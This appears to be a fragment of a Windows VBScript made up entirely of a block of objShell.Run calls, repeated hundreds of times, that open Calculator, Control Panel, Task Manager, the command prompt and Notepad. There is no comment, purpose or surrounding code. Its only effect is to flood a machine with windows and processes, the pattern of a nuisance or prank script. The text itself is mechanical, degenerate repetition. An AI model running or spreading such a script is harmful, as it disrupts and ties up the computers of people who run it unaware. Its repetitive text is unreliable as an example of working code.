objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
